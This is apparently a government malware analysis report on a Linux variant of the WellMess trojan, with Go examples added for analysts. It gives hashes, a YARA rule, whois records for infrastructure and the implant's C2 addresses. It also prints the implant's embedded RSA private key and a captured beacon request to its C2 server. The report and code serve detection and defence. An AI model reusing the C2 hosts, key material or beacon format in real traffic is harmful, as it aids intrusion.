mnt-by:         arcompusmedia-mnt
created:        2015-10-05T12:27:29Z
last-modified: 2015-10-05T12:27:59Z
source:         RIPE
organisation: ORG-AMIS1-RIPE
org-name:     Arcompus Medianet Int. SARL
org-type:     OTHER
address:        Baabda
address:        Lebanon
e-mail:         noc@lubnanet.com
abuse-c:        AC32241-RIPE
mnt-ref:        arcompusmedia-mnt
mnt-by:         arcompusmedia-mnt
created:        2015-10-02T07:33:53Z
last-modified: 2020-01-03T08:52:39Z
source:         RIPE
role:         Network Operations Centre
address:        15 Saed Fraiha,
address:        Baabda, 1003,
address:        Lebanon
e-mail:         noc@lubnanet.com
abuse-mailbox: noc@lubnanet.com
nic-hdl:        AMN61-RIPE
mnt-by:         arcompusmedia-mnt
created:        2015-10-02T07:36:29Z
last-modified: 2020-01-03T08:31:27Z
source:         RIPE
% Information related to '85.93.2.0/24AS203913'
route:         85.93.2.0/24
descr:         ArcompusMedia
origin:         AS203913
mnt-by:         arcompusmedia-mnt
created:        2015-12-15T16:27:03Z
last-modified: 2018-02-06T10:01:56Z
source:         RIPE
% This query was served by the RIPE Database Query Service version 1.97.2 (ANGUS)

Relationships
85.93.2.116 Connected_From 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854
Description

47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854 attempts to connect to the IP address.

5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb

Tags

trojan

Details
Name 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb
Size 6900178 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (SYSV)
MD5 3a9cdd8a5cbc3ab10ad64c4bb641b41f
SHA1 e45f89c923d0361ce8f9c64a63031860a76b2d10
SHA256 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb
SHA512 2d1d26081637c925fb6ae5f92b278f87a8253fd65a75c44fdc2c513a24dc9e0658c552ebc9c9c76c70ad948c60901e682184a833aae51a8c4d6220e883e05aef
ssdeep 49152:hPyt5H89G+YrbjVWMiUMNqb054dzNIdEp+rt1D5TvLlcpigaB5IDPmoFjPnMBbs0:hqHaQKNzVLlhLopfMlsnh8K54
Entropy 6.016965
Antivirus
Antiy Trojan/Linux.WellMess
BitDefender Trojan.Linux.Generic.173705
ESET a variant of Linux/WellMess.B trojan
Emsisoft Trojan.Linux.Generic.173705 (B)
YARA Rules
rule CISA_10296782_01 : trojan WELLMESS
{
    meta:
        Author = "CISA Code & Media Analysis"
        Date= "2020-07-06"
        Last_Modified="20200706_1017"
        Actor="n/a"
        Category="Trojan"
        Family="WellMess"
        Description = "Detects WellMess implant and SangFor Exploit"
        MD5_1 = "4d38ac3319b167f6c8acb16b70297111"
        SHA256_1 = "7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee"
        MD5_2 = "a32e1202257a2945bf0f878c58490af8"
        SHA256_2 = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
        MD5_3 = "861879f402fe3080ab058c0c88536be4"
        SHA256_3 = "14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2"
        MD5_4 = "2f9f4f2a9d438cdc944f79bdf44a18f8"
        SHA256_4 = "e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09"
        MD5_5 = "ae7a46529a0f74fb83beeb1ab2c68c5c"
        SHA256_5 = "fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950"
        MD5_6 = "f18ced8772e9d1a640b8b4a731dfb6e0"
        SHA256_6 = "953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a"
        MD5_7 = "3a9cdd8a5cbc3ab10ad64c4bb641b41f"
        SHA256_7 = "5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb"
        MD5_8 = "967fcf185634def5177f74b0f703bdc0"
        SHA256_8 = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
        MD5_9 = "c5d5cb99291fa4b2a68b5ea3ff9d9f9a"
        SHA256_9 = "65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75"
        MD5_10 = "01d322dcac438d2bb6bce2bae8d613cb"
        SHA256_10 = "0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494"
        MD5_11 = "8777a9796565effa01b03cf1cea9d24d"
        SHA256_11 = "83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18"
        MD5_12 = "507bb551bd7073f846760d8b357b7aa9"
        SHA256_12 = "47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854"
    strings:
        $0 = "/home/ubuntu/GoProject/src/bot/botlib/chat.go"
        $1 = "/home/ubuntu/GoProject/src/bot/botlib.Post"
        $2 = "GoProject/src/bot/botlib.deleteFile"
        $3 = "ubuntu/GoProject/src/bot/botlib.generateRandomString"
        $4 = "GoProject/src/bot/botlib.AES_Decrypt"
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = "get_keyRC6"
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = "GoProject/src/bot/botlib.wellMess"
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
}
ssdeep Matches

No matches found.

Relationships
5ca4a9f655... Connected_To 209.58.186.196
5ca4a9f655... Connected_To 141.98.212.55
Description

This artifact is an ELF 64-bit file. It has been identified as a variant of the WellMess malware family. When the file is executed, it attempts to create a C2 connection to one of the following IP addresses:

141.98.212.55 over Transmission Control Protocol (TCP) port 53
209.58.186.196 over TCP port 443

The C2 session over port 53 is a standard WellMess C2 session, in which parts of each message are encrypted with RSA and RC6. The C2 session over port 443 is instead carried inside a Secure Sockets Layer (SSL) session.

The following keys and certificates are used to create the secure connection:

—Begin Keys and Certificates—

—Begin Certificate—
[certificate body omitted]
—End Certificate—

—Begin Certificate—
[certificate body omitted]
—End Certificate—

—Begin RSA Private Key—
MIIEowIBAAKCAQEAsLZde+H/Bu3mA8xRa2c9DCmdYqncvGC1Re9BO3c+kCcUbVqy
R2t3mPrDpW4L94MDDHEF7LZ5VcXvNCTrfwRKI+ncoGQrs6yR0xM7Ru1ObV/E6GdU
GvlJMy2WKE3UsiHx2BJ2MnHvKa1yJSt5wjkMKEwqbUHQIbLqmwrZ/Ud1AW+tZEs6
kfEEuobNfIqLpZDLGT17FGnshqUa+iMnQ9b9Nax42kgm/2AsD0N0rW8+DOoP7RiC
PqsbcUanquxpLqpO9Zyw517wHLpImUn56B+dwnHVWb8oO5qqikB2X+cq3rnSAaaB
AD4JDVdQqS9poEXDnbBdGJczXSPFdx0UrOC5kQIDAQABAoIBAQCAXRhvQu00JV+u
Zp7GPAoWaaxP3T/g/wbutCtYfPhPUnP+M6HJS4Fm+NFhvBypQNvYD8nT94EQE2X9
JMyESaNpjxma0OkF7VdIUnH+xabwwF6Sy2xG48qOiJDI2jCk7Q92e4KshiLKzZla
8sfRlAsGwr0W/HWp5QOSeEF9QIj37udx8zoo68ROFLe3RIbc4VsjN4/rC46K1YHb
Oi9J+M2ScFWTjHYAu4Pvrjd8WqvPudF5FG+g4pF9qGhGhM27q37skNHr1REby/UU
QC7zzAUJB9c+Wr+iREDI3psItVzCL7ZXqHpG2qM3VdqMz+m+EN1vnfZWNX4EuaUa
Hp/YhOCZAoGBAOiS0Cs6RWtXEnNdSD3ap0M9yqwtrdV7iNcy4PGtIOTICN/3paVF
EatcOowqwpXiihZIEWDAe2QuvlocL4rIDHof42kInr7nM9pMHZia50qtSmGATwTN
3BbqTkK7O2wSbsZoZzRpTMB6kYonsw1xg02jTh+aXTMstpL/2I96v7AvAoGBAMKD
GxUKspKSF9xPkaR1jI3YOp5GYZxhkbR/O4cZgHEClbZlwkd+er63ecvxNoNOYmu9
Mdh98t+Dsnv1zrA3cFAxmsmwiAvc/tPpv3KQPVe2XbWza1o9vueHYpSoE/wwjxmK
WOV0Cazihoa0MV+lVyPRhKgCV1xLGcLc8kcD7AI/AoGAQ9WGaAVP+BXmaMWda4UZ
4g/kzEFqgWjNqc7KM1NG09PQWtrVcpXpqGx3Gyjhpmvz0Lnmb6zUkIzdslSkPTtK
AFjKsHj2LEItKo+m1jrgGTTgC/4rjgApIHnop6gKlePucWpEJ9JKs51MU9pubA5e
uMdX4vnYEzQIcGm1FWw8+rsCgYBuLVkvyAlyYHJHhoKWx0bAKdS6Rl+P9uxTcyZC
1j0cxjwLPwSW/puEX+ULkiwwoDu7j0UmveDOnoiBErDqu9xQcGifCfFl1t45JtQc
jntQranS/Dg4u3ThLJy4W6RGWzMTYnwMLHg2h3Fv56134e3ECi+8Aud9DcUfzYsm
kqAifQKBgHtMn87pL0wQ8eLpk/5+4fSVR5cCBS9/oBciO/g2g88Grb69g8PTyn99
bhiRlKDfAPnA/+gYtjCMNbyKkCy2Kf4UaWh3cMJnGafFTOci2Uve4zj/SSePAp3O
viyz2EuMK0ZZc4nNBK6leRFq4GEgwZSr7RakpKU1t3vlhMrRDuSI
—End RSA Private Key—

—Begin Public Key—
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArRiKDue9YA6DUzYu6WQv
oWOxp8wel/Ws/5jK1Xsv2f8lJwUDxM+zT4dGL3ZyJLMkbBQk8HyvAm+6331M47vF
sbva2BCzQxdEWO9ey3LnhCtpQOgjypf1QcPy4Kx6jj2BiVEtPP9YBa75QkUNR0oO
0n6PKFP8SX6Mv0UyHqS3tsa8D21nm2hf3rO7sqBXevs9xdvKbxiKLJxY6WEvKAGH
7Q09rndwr4b7gJ56GZGBwVeqkoVmRFM/nNq9aymTOe4PNRdOcpYK7AoT/QjA0IvO
Q5XOapb3iJWHLlxCGfBRT+ISVfg4PVdXev2wsXFe6h3McXHoN7FZgyo10XiP2QZU
RQIDAQAB
—End Public Key—

—End Keys and Certificates—
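Before reasoning about what the embedded key material is for, an analyst will want to confirm that the blobs parse at all and find out whether the public key is simply the public half of the private key or a second, unrelated key. The Go program below is an added example written for readers of this report; it is not code from the report or from the implant. It decodes the base64 printed above (copied verbatim; the certificates are not included), parses the PKCS#1 private key and the SubjectPublicKeyInfo public key with Go's standard library, and reports modulus sizes and whether the two share a modulus and public exponent. The function and type names are the example's own.

```go
package main

import (
	"crypto/rsa"
	"crypto/x509"
	"encoding/base64"
	"fmt"
	"strings"
)

// Base64 key material copied verbatim from the report's "Keys and
// Certificates" block for 5ca4a9f6... (the certificates are not reproduced).
const embeddedPrivateKeyB64 = `
MIIEowIBAAKCAQEAsLZde+H/Bu3mA8xRa2c9DCmdYqncvGC1Re9BO3c+kCcUbVqy
R2t3mPrDpW4L94MDDHEF7LZ5VcXvNCTrfwRKI+ncoGQrs6yR0xM7Ru1ObV/E6GdU
GvlJMy2WKE3UsiHx2BJ2MnHvKa1yJSt5wjkMKEwqbUHQIbLqmwrZ/Ud1AW+tZEs6
kfEEuobNfIqLpZDLGT17FGnshqUa+iMnQ9b9Nax42kgm/2AsD0N0rW8+DOoP7RiC
PqsbcUanquxpLqpO9Zyw517wHLpImUn56B+dwnHVWb8oO5qqikB2X+cq3rnSAaaB
AD4JDVdQqS9poEXDnbBdGJczXSPFdx0UrOC5kQIDAQABAoIBAQCAXRhvQu00JV+u
Zp7GPAoWaaxP3T/g/wbutCtYfPhPUnP+M6HJS4Fm+NFhvBypQNvYD8nT94EQE2X9
JMyESaNpjxma0OkF7VdIUnH+xabwwF6Sy2xG48qOiJDI2jCk7Q92e4KshiLKzZla
8sfRlAsGwr0W/HWp5QOSeEF9QIj37udx8zoo68ROFLe3RIbc4VsjN4/rC46K1YHb
Oi9J+M2ScFWTjHYAu4Pvrjd8WqvPudF5FG+g4pF9qGhGhM27q37skNHr1REby/UU
QC7zzAUJB9c+Wr+iREDI3psItVzCL7ZXqHpG2qM3VdqMz+m+EN1vnfZWNX4EuaUa
Hp/YhOCZAoGBAOiS0Cs6RWtXEnNdSD3ap0M9yqwtrdV7iNcy4PGtIOTICN/3paVF
EatcOowqwpXiihZIEWDAe2QuvlocL4rIDHof42kInr7nM9pMHZia50qtSmGATwTN
3BbqTkK7O2wSbsZoZzRpTMB6kYonsw1xg02jTh+aXTMstpL/2I96v7AvAoGBAMKD
GxUKspKSF9xPkaR1jI3YOp5GYZxhkbR/O4cZgHEClbZlwkd+er63ecvxNoNOYmu9
Mdh98t+Dsnv1zrA3cFAxmsmwiAvc/tPpv3KQPVe2XbWza1o9vueHYpSoE/wwjxmK
WOV0Cazihoa0MV+lVyPRhKgCV1xLGcLc8kcD7AI/AoGAQ9WGaAVP+BXmaMWda4UZ
4g/kzEFqgWjNqc7KM1NG09PQWtrVcpXpqGx3Gyjhpmvz0Lnmb6zUkIzdslSkPTtK
AFjKsHj2LEItKo+m1jrgGTTgC/4rjgApIHnop6gKlePucWpEJ9JKs51MU9pubA5e
uMdX4vnYEzQIcGm1FWw8+rsCgYBuLVkvyAlyYHJHhoKWx0bAKdS6Rl+P9uxTcyZC
1j0cxjwLPwSW/puEX+ULkiwwoDu7j0UmveDOnoiBErDqu9xQcGifCfFl1t45JtQc
jntQranS/Dg4u3ThLJy4W6RGWzMTYnwMLHg2h3Fv56134e3ECi+8Aud9DcUfzYsm
kqAifQKBgHtMn87pL0wQ8eLpk/5+4fSVR5cCBS9/oBciO/g2g88Grb69g8PTyn99
bhiRlKDfAPnA/+gYtjCMNbyKkCy2Kf4UaWh3cMJnGafFTOci2Uve4zj/SSePAp3O
viyz2EuMK0ZZc4nNBK6leRFq4GEgwZSr7RakpKU1t3vlhMrRDuSI
`

const embeddedPublicKeyB64 = `
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArRiKDue9YA6DUzYu6WQv
oWOxp8wel/Ws/5jK1Xsv2f8lJwUDxM+zT4dGL3ZyJLMkbBQk8HyvAm+6331M47vF
sbva2BCzQxdEWO9ey3LnhCtpQOgjypf1QcPy4Kx6jj2BiVEtPP9YBa75QkUNR0oO
0n6PKFP8SX6Mv0UyHqS3tsa8D21nm2hf3rO7sqBXevs9xdvKbxiKLJxY6WEvKAGH
7Q09rndwr4b7gJ56GZGBwVeqkoVmRFM/nNq9aymTOe4PNRdOcpYK7AoT/QjA0IvO
Q5XOapb3iJWHLlxCGfBRT+ISVfg4PVdXev2wsXFe6h3McXHoN7FZgyo10XiP2QZU
RQIDAQAB
`

// KeyFacts is what an analyst wants to know about embedded RSA material.
type KeyFacts struct {
	PrivateBits int  // modulus size of the PKCS#1 private key
	PublicBits  int  // modulus size of the SubjectPublicKeyInfo public key
	SamePair    bool // true only if the public key is the private key's own half
}

// decodeB64 strips the line breaks the report inserts for readability.
func decodeB64(s string) ([]byte, error) {
	return base64.StdEncoding.DecodeString(strings.Join(strings.Fields(s), ""))
}

// AnalyzeEmbeddedKeys parses both blobs with the standard library and reports
// whether they form one key pair. ParsePKCS1PrivateKey also validates the
// private key's CRT components, so a corrupted blob surfaces as an error.
func AnalyzeEmbeddedKeys(privB64, pubB64 string) (KeyFacts, error) {
	privDER, err := decodeB64(privB64)
	if err != nil {
		return KeyFacts{}, fmt.Errorf("private key base64: %w", err)
	}
	priv, err := x509.ParsePKCS1PrivateKey(privDER)
	if err != nil {
		return KeyFacts{}, fmt.Errorf("private key DER: %w", err)
	}
	pubDER, err := decodeB64(pubB64)
	if err != nil {
		return KeyFacts{}, fmt.Errorf("public key base64: %w", err)
	}
	pubAny, err := x509.ParsePKIXPublicKey(pubDER)
	if err != nil {
		return KeyFacts{}, fmt.Errorf("public key DER: %w", err)
	}
	pub, ok := pubAny.(*rsa.PublicKey)
	if !ok {
		return KeyFacts{}, fmt.Errorf("public key is %T, not RSA", pubAny)
	}
	return KeyFacts{
		PrivateBits: priv.N.BitLen(),
		PublicBits:  pub.N.BitLen(),
		SamePair:    priv.N.Cmp(pub.N) == 0 && priv.E == pub.E,
	}, nil
}

func main() {
	facts, err := AnalyzeEmbeddedKeys(embeddedPrivateKeyB64, embeddedPublicKeyB64)
	fmt.Printf("%+v error=%v\n", facts, err)
}
```

Run it with `go run`. A parse error is itself a finding: either the key was mistranscribed or the sample carries deliberately malformed material. A SamePair value of false means the public key belongs to a different key pair and was embedded for some purpose other than pairing with the private key, which matters when deciding which side of the exchange each key can be used against.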

The implant uses TCP ports 53 and 443 because these ports are likely to be allowed outbound through firewalls and routers. Outbound TCP connections to port 53 are nonetheless unusual: the port is reserved for the Domain Name System (DNS), client queries are normally sent over UDP, and TCP is used mainly for responses too large for UDP and for zone transfers. A host opening a TCP/53 connection to an external address and sending HTTP instead of a DNS message, as in the session reproduced below, should be flagged as suspicious.

The malware contains functions similar in design to those of the .NET version of WellMess (47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854). Figures 5 through 7 show that both implants contain similarly named functions, "Work" and "SendMessage".

In addition, this sample contains a function named "botlib_Exec" that is very similar in design and purpose to the "Command" function within 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854. Both implants use the same regular expression to parse executable scripts out of data received from the remote operator over the C2 session (Figure 8).

The primary difference between the implants is that this version first attempts a C2 session with 141.98.212.55 over port 53; if that server is unavailable, it attempts an SSL-secured C2 session with 209.58.186.196 over port 443. The RSA private key embedded in the implant most likely exists to support that SSL session, which also means the key is recoverable by anyone who obtains the sample.

—Begin WellMess C2 session—
POST / HTTP/1.1
Host: 141.98.212.55:53
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
Content-Length: 422
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cookie: kODDoMox=1BL6+BSiiy+oacN+71k8zt0+QD9kU+68ED+dmsgi+yPol5+b%2C; OVbjPRp4=0w1X.+2IB+nuI+58oEfe4+q9P+nrw+pmQk3X+fN%2CB9u+aP%2C3EB.+%3Aa%3A+0UOlTc+Ew%2Cy5O+Y%2CXTx%2C+Of7mNHE+PMvR+ReAze6+P15ihyA.+zysw+USxJ8+nxu3p6D+tkFDV8w++++++
Accept-Encoding: gzip

DZ0 rUtgNTf e,j:gB DFd dLSYB mq53txH 8JYY75r EQXyIUk 2FqYSrc. xscOr3E rzbl Q494 Gvkb1q sifD6 pog q0Ybz4D asij. 26sQ PkMZPh1 IyV 8VW 0C3038b QpTy8Cf z6mJw oeg. 6MG8,lQ ymdPXR q1tRd Fxg brhM 7cp Zf9JPKV CcKyKPK. OFdOqE 6XO oL8kKA qnq 9c2Yc9 ,xm6Gdy ra9 ORzvq. 3BX8q 6rE 2:H 1ALG8G N7yX 8hn3aNR kHykST9 KucSC2. b0l LJBc6i 9hK2 ZtJ1 jLi9cUA 7VRh G6PGAU qM9n5FD. bTy YMzPKF KKnk0i TyYK SMAV sbE 2Jflrk yPmCpN. 2X35q5 JhXg    
—End WellMess C2 Session—
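The port-53 observation above (HTTP carried on a port reserved for DNS) can be turned into a check on captured traffic. The Go program below is an added example that is not part of the report and not the implant's code. It classifies the first client-to-server bytes of a TCP/53 connection as a DNS-over-TCP query, an HTTP request, or unknown, and pulls the Host header out of HTTP requests so the unusual `:53` destination shows up in a log line. The DNS sample it builds is constructed for the example; the HTTP sample is the request head from the session above with the body left out. Function and constant names are the example's own.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"strings"
)

// Classification labels for the first client-to-server bytes on TCP/53.
const (
	ClassDNS     = "dns-over-tcp"
	ClassHTTP    = "http-on-53" // what the WellMess session looks like on the wire
	ClassUnknown = "unknown"
)

// looksLikeDNSOverTCP applies RFC 1035 section 4.2.2 framing: a two-byte
// length prefix matching the remaining payload, a 12-byte header with QR=0
// and QDCOUNT>=1, and a well-formed first QNAME (labels of at most 63 bytes).
func looksLikeDNSOverTCP(p []byte) bool {
	if len(p) < 2+12 || int(binary.BigEndian.Uint16(p[:2])) != len(p)-2 {
		return false
	}
	flags := binary.BigEndian.Uint16(p[4:6])   // message offset 2
	qdcount := binary.BigEndian.Uint16(p[6:8]) // message offset 4
	if flags&0x8000 != 0 || qdcount == 0 {
		return false
	}
	i := 14 // first byte after the header
	for i < len(p) && p[i] != 0 {
		l := int(p[i])
		if l > 63 {
			return false
		}
		i += 1 + l
	}
	return i+1+4 <= len(p) // terminating zero, QTYPE and QCLASS must fit
}

// looksLikeHTTPRequest accepts a request line of the form "<METHOD> <target> HTTP/1.x".
func looksLikeHTTPRequest(p []byte) bool {
	end := bytes.Index(p, []byte("\r\n"))
	if end < 0 {
		return false
	}
	fields := bytes.Fields(p[:end])
	if len(fields) != 3 || !bytes.HasPrefix(fields[2], []byte("HTTP/1.")) {
		return false
	}
	switch string(fields[0]) {
	case "GET", "POST", "PUT", "HEAD", "OPTIONS":
		return true
	}
	return false
}

// ClassifyPort53Payload labels a payload. The DNS test runs first because its
// checks are structural and will not pass for HTTP text.
func ClassifyPort53Payload(p []byte) string {
	switch {
	case looksLikeDNSOverTCP(p):
		return ClassDNS
	case looksLikeHTTPRequest(p):
		return ClassHTTP
	}
	return ClassUnknown
}

// HostHeader returns the Host header of an HTTP request head, or "" if absent.
func HostHeader(p []byte) string {
	for _, line := range strings.Split(string(p), "\r\n")[1:] {
		if line == "" {
			break // blank line ends the headers
		}
		if k, v, ok := strings.Cut(line, ":"); ok && strings.EqualFold(k, "Host") {
			return strings.TrimSpace(v)
		}
	}
	return ""
}

// buildDNSQueryTCP frames a constructed A query for name as DNS over TCP.
func buildDNSQueryTCP(name string) []byte {
	msg := []byte{0x12, 0x34, 0x01, 0x00, 0, 1, 0, 0, 0, 0, 0, 0} // id, RD set, QDCOUNT=1
	for _, label := range strings.Split(name, ".") {
		msg = append(msg, byte(len(label)))
		msg = append(msg, label...)
	}
	msg = append(msg, 0, 0, 1, 0, 1) // root label, QTYPE=A, QCLASS=IN
	framed := make([]byte, 2, 2+len(msg))
	binary.BigEndian.PutUint16(framed, uint16(len(msg)))
	return append(framed, msg...)
}

// wellMessRequestHead is the request head from the session in the report
// (body omitted), which the report shows arriving on TCP port 53.
func wellMessRequestHead() []byte {
	head := `POST / HTTP/1.1
Host: 141.98.212.55:53
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
Content-Length: 422
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cookie: kODDoMox=1BL6+BSiiy+oacN+71k8zt0+QD9kU+68ED+dmsgi+yPol5+b%2C; OVbjPRp4=0w1X.+2IB+nuI+58oEfe4+q9P+nrw+pmQk3X+fN%2CB9u+aP%2C3EB.+%3Aa%3A+0UOlTc+Ew%2Cy5O+Y%2CXTx%2C+Of7mNHE+PMvR+ReAze6+P15ihyA.+zysw+USxJ8+nxu3p6D+tkFDV8w++++++
Accept-Encoding: gzip
`
	return []byte(strings.ReplaceAll(head, "\n", "\r\n") + "\r\n")
}

func main() {
	for name, p := range map[string][]byte{"dns query": buildDNSQueryTCP("example.com"), "wellmess request": wellMessRequestHead()} {
		fmt.Printf("%-17s %-13s host=%q\n", name, ClassifyPort53Payload(p), HostHeader(p))
	}
}
```

In a sensor the same two functions would run on the first segment of each outbound TCP/53 flow; anything that is neither DNS nor unknown binary deserves an alert, and an HTTP verdict with a Host header ending in `:53` is exactly the pattern this sample produces.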

Screenshots